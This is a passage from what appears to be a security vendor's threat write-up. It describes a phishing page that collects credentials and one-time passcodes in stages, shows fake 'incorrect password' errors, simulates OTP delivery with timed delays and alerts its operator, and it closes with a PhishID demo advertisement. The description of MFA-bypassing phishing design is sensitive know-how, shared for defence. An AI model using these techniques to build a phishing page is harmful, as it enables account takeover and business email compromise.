The page demonstrates moderate sophistication with its multi-stage collection workflow, fake "incorrect password" error generation to encourage multiple attempts, automatic modal transitions with 5-second delays to simulate legitimate OTP delivery, and includes admin notification functionality via "notify_admin.php" when users request OTP resends. Notable technical elements include jQuery-based AJAX form submission with stage tracking (stage-one, stage-three classes), dynamic provider selection through data attributes, and Cloudflare hosting with beacon tracking, making this a well-engineered business email compromise tool designed to fully bypass modern MFA protections.
Learn how PhishID can help protect your district from cutting-edge threats like these! Schedule a Demo